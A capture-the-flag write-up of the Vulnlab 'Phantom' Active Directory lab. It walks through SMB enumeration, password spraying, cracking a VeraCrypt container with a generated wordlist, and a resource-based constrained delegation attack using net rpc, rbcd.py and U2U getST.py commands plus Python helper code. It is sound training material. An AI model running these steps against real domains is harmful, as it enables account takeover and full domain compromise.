2024-07-20 01:26:27 +03:00


Vulnlab - Phantom

```
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: phantom.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
```

Enumerating SMB shares with an anonymous login.

The Public share contains a tech support mail file,

which carries a base64-encoded PDF attachment.

After decoding the base64, the PDF gives us a password.

We don't have a username yet, so we cycle RIDs with Impacket's lookupsid.py to enumerate domain usernames.

Spraying the password against all of these users, ibryant is the only account it works for.

After logging on to the Departments share, there's a backup file in the IT folder.

The .hc extension tells us it's a VeraCrypt container, i.e. an encrypted volume. Its password can be cracked with hashcat, but it isn't in rockyou.txt, so we generate a custom wordlist from the company name, a year and a special character, as mentioned in the hint on the Vulnlab wiki.
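A small generator for exactly that kind of wordlist, added here as an example (it is not part of the original writeup). The company name, year range and symbol set passed in at the bottom are assumptions; the output file is meant to be handed to hashcat against the .hc container.

```python
"""Added example: build a hashcat wordlist from a company name, a year and a special
character, as the hint suggests. Name, years and symbols are assumptions, not box data."""
import itertools


def case_variants(word: str):
    """lower, Capitalised and UPPER forms, de-duplicated in order."""
    return list(dict.fromkeys([word.lower(), word.capitalize(), word.upper()]))


# Patterns with a symbol slot and without one; {yy} is the two-digit year.
SYMBOL_PATTERNS = ("{name}{year}{sym}", "{name}{sym}{year}", "{sym}{name}{year}",
                   "{name}{yy}{sym}", "{sym}{name}{yy}")
PLAIN_PATTERNS = ("{name}{year}", "{name}{yy}")


def company_wordlist(company: str, years, symbols=("!", "@", "#", "$", ".")):
    """Every combination of case variant, year and symbol, unique, in generation order."""
    candidates = []
    for name, year in itertools.product(case_variants(company), years):
        fields = {"name": name, "year": str(year), "yy": str(year)[-2:]}
        candidates += [p.format(**fields) for p in PLAIN_PATTERNS]
        for sym in symbols:
            candidates += [p.format(sym=sym, **fields) for p in SYMBOL_PATTERNS]
    return list(dict.fromkeys(candidates))


def write_wordlist(path: str, words) -> int:
    """Write one candidate per line; returns the number written."""
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(words) + "\n")
    return len(words)


if __name__ == "__main__":
    # Assumed inputs: company "phantom", years 2020..2024, default symbol set.
    words = company_wordlist("phantom", range(2020, 2025))
    print(write_wordlist("phantom.lst", words), "candidates written to phantom.lst")
```

The patterns are deliberately few; widening the year range or the symbol set costs almost nothing for a hashcat run, whereas adding more patterns is where the list grows multiplicatively.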

Mounting the container with VeraCrypt.

Inside there's a VyOS backup (VyOS is an open source router and firewall OS). From the config file we can retrieve the password for lstanely,

which didn't work for that account, but we can spray it against the list of domain users we have.

The user it works for can log in over WinRM.

Enumerating the domain with BloodHound: our user has ForceChangePassword over some domain users.

Those users are members of the ICT Security group, which has AddAllowedToAct on the domain controller. With that right we can write msDS-AllowedToActOnBehalfOfOtherIdentity on the DC and add an account we control to it, setting up Resource-Based Constrained Delegation (RBCD). First the target user's password is changed with net rpc:

```bash
net rpc password WSILVA -U phantom.vl/svc_sspr -S dc.phantom.vl
```

Editing the msDS-AllowedToActOnBehalfOfOtherIdentity property with Impacket's rbcd.py:

```bash
rbcd.py -delegate-to 'DC$' -delegate-from 'WSILVA' -dc-ip 10.10.118.204 -action 'write' 'phantom.vl'/'WSILVA':'Phantom2023!'
```
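What rbcd.py actually writes into that attribute is a self-relative security descriptor whose DACL holds one allow ACE per delegating principal. The following is an added example (not impacket's code) that encodes and decodes that blob with nothing but `struct`; the constants match what rbcd.py uses (owner/group BUILTIN\Administrators, control 0x8004, access mask 983551) and the SIDs in the demo are constructed, not the ones from the box.

```python
"""Added example: encode/decode the security descriptor stored in
msDS-AllowedToActOnBehalfOfOtherIdentity. Constants mirror impacket's rbcd.py;
the sample SIDs are constructed for illustration."""
import struct

SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
ACL_REVISION_DS = 4
FULL_CONTROL = 0x000F01FF            # 983551, the mask rbcd.py grants to the delegating principal
ADMINISTRATORS_SID = "S-1-5-32-544"  # owner and group that rbcd.py puts in the descriptor


def sid_to_bytes(sid: str) -> bytes:
    """Serialise 'S-1-5-21-...' into binary SID form (identifier authority is big-endian)."""
    parts = sid.split("-")
    if parts[0] != "S":
        raise ValueError("not a SID: %r" % sid)
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", revision, len(subs))
            + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(data: bytes, offset: int = 0):
    """Parse a binary SID at offset; returns (sid_string, end_offset)."""
    revision, count = struct.unpack_from("<BB", data, offset)
    authority = int.from_bytes(data[offset + 2:offset + 8], "big")
    subs = struct.unpack_from("<%dI" % count, data, offset + 8)
    sid = "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)
    return sid, offset + 8 + 4 * count


def build_rbcd_descriptor(delegate_from_sids) -> bytes:
    """Self-relative SD: 20-byte header, owner, group, then a DACL with one allow ACE per SID."""
    owner = group = sid_to_bytes(ADMINISTRATORS_SID)
    aces = b""
    for sid in delegate_from_sids:
        sid_bytes = sid_to_bytes(sid)
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_bytes), FULL_CONTROL) + sid_bytes
    dacl = struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(aces), len(delegate_from_sids), 0) + aces
    off_owner = 20
    off_group = off_owner + len(owner)
    off_dacl = off_group + len(group)
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         off_owner, off_group, 0, off_dacl)  # SACL offset 0: none present
    return header + owner + group + dacl


def parse_rbcd_descriptor(data: bytes):
    """Return [(sid, access_mask), ...] for each allow ACE, i.e. what 'rbcd.py -action read' lists."""
    _, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", data, 0)
    if not (control & SE_DACL_PRESENT) or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", data, off_dacl)
    pos, entries = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size, mask = struct.unpack_from("<BBHI", data, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            entries.append((bytes_to_sid(data, pos + 8)[0], mask))
        pos += ace_size  # skip the ACE whatever its type
    return entries


def add_delegate(existing: bytes, new_sid: str) -> bytes:
    """Mirror 'rbcd.py -action write': keep SIDs already allowed and append the new one."""
    current = [sid for sid, _ in parse_rbcd_descriptor(existing)] if existing else []
    if new_sid not in current:
        current.append(new_sid)
    return build_rbcd_descriptor(current)


if __name__ == "__main__":
    # Constructed SID standing in for the WSILVA user object (not the real one).
    wsilva = "S-1-5-21-1111111111-2222222222-3333333333-1105"
    blob = add_delegate(b"", wsilva)
    print(blob.hex())
    print(parse_rbcd_descriptor(blob))
```

Two things worth noticing when you read the attribute back on a real DC: the delegating principal is referenced by SID only, so a user account works just as well as a machine account at this layer (the quota problem discussed next is about creating accounts, not about this descriptor), and `add_delegate` keeps existing ACEs, which is what you want when the attribute is already populated for legitimate delegation.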

To abuse RBCD the usual approach is to create a machine account and add it to the DC's property, which needs ms-DS-MachineAccountQuota to be greater than zero, but here the quota is set to 0.

However, RBCD can still be performed with a normal domain user account. For this we need a modified branch of getST.py that supports the U2U (user-to-user) Kerberos extension: https://github.com/ShutdownRepo/impacket/tree/getST

First retrieve a TGT for WSILVA via overpass-the-hash, extract the TGT's session key, and set the user's NT hash to that session key. This is needed because the S4U2self ticket obtained via U2U is encrypted with the TGT session key, and during S4U2proxy the KDC decrypts that ticket with the user's long-term key, so the two have to match.

With S4U2self plus U2U, WSILVA obtains a service ticket to itself on behalf of Administrator, and S4U2proxy then turns it into a service ticket for the target the user is allowed to delegate to, here host/dc.phantom.vl:

```bash
KRB5CCNAME=./WSILVA.ccache getST.py -u2u -impersonate "Administrator" -spn "host/dc.phantom.vl" -k -no-pass phantom.vl/WSILVA
```
